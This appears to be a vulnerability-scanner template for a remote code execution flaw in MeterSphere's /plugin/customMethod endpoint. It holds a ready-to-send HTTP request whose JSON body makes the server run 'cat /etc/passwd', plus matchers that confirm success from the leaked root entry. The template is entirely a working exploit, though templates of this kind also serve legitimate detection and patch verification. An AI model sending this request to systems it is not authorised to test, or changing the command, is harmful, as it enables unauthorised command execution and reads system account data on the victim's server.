id: poc-yaml-metersphere-plugincontroller-rce

info:
  name: poc-yaml-metersphere-plugincontroller-rce
  author: we1x4n(https://we1x4n.com/)
  severity: critical
  tags: xray-converted,rce,ct-416542
  reference:
    - https://xz.aliyun.com/t/10772

http:
  - raw:
      - |
        POST /plugin/customMethod HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"entry": "Evil", "request": "cat /etc/passwd"}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"